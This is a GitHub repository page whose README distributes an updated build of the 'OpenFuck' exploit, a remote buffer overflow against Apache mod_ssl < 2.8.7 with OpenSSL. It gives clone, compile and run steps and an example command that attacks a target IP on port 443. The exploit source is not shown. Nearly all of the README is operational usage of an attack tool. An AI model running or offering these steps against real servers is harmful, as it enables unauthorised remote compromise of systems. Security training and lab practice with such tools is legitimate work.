Skip to content
master
Go to file
Code
This branch is 5 commits behind heltonWernik:master.

Latest commit

“Helton “Helton
“Helton and “Helton Readme
232f357

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
Jun 24, 2018
Jun 24, 2018

README.md

OpenFuck

Usage

This Exploit (https://www.exploit-db.com/exploits/764/) is outdated. Here you can take updated

  1. Download OpenFuck.c
git clone https://github.com/heltonWernik/OpenFuck.git
  1. Install ssl-dev library
apt-get install libssl-dev
  1. It's Compile Time
gcc -o OpenFuck OpenFuck.c -lcrypto
  1. Running the Exploit
./OpenFuck
  1. See which service you witch to exploit. For example if you need to Red Hat Linux, using apache version 1.3.20. Trying out using the 0x6a option ./OpenFuck 0x6a [Target Ip] [port] -c 40

for example:

./OpenFuck 0x6a 192.168.80.145 443 -c 40

References: https://kongwenbin.wordpress.com/tag/openfuck/ https://medium.com/@javarmutt/how-to-compile-openfuckv2-c-69e457b4a1d1

About

OpenFuck exploit updated to linux 2018 - Apache mod_ssl < 2.8.7 OpenSSL - Remote Buffer Overflow

Topics

Resources

Releases

No releases published

Packages

No packages published

Languages

You can’t perform that action at this time.